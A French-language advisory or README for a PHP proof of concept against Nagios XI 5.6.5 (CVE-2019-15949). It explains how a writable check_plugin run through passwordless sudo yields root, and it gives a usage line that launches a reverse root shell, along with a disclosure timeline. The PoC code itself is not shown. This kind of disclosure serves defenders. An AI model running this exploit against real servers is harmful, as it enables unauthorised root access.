
POC qui exploite une vulnérabilité dans Nagios XI (5.6.5) pour lancer un shell root.
Une vulnérabilité existe dans Nagios XI <= 5.6.5 permettant à un attaquant d'exploiter une RCE pour élever ses privilèges à root.
L'exploitation nécessite un accès au serveur en tant qu'utilisateur 'nagios', ou un accès CCM via l'interface web avec des autorisations pour gérer les plugins.
Le script getprofile.sh, invoqué en téléchargeant un profil système (profile.php?cmd=download), est exécuté en tant que root via une entrée sudo sans mot de passe ; le script exécute l'exécutable 'check_plugin' qui appartient à l'utilisateur nagios.
Un utilisateur connecté à Nagios XI avec des autorisations pour modifier les plugins, ou l'utilisateur 'nagios' sur le serveur, peut modifier l'exécutable 'check_plugin' et insérer des commandes malveillantes exécutables en tant que root.
Un POC en PHP a été développé, qui téléverse une charge utile résultant en un shell root inversé.
Utilisation :
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
Signalé à Nagios le : 29 juillet 2019
Confirmé par Nagios le : 29 juillet 2019
Corrigé dans la version : 5.6.6 le : 20 août 2019
CVE attribué le : 6 septembre 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
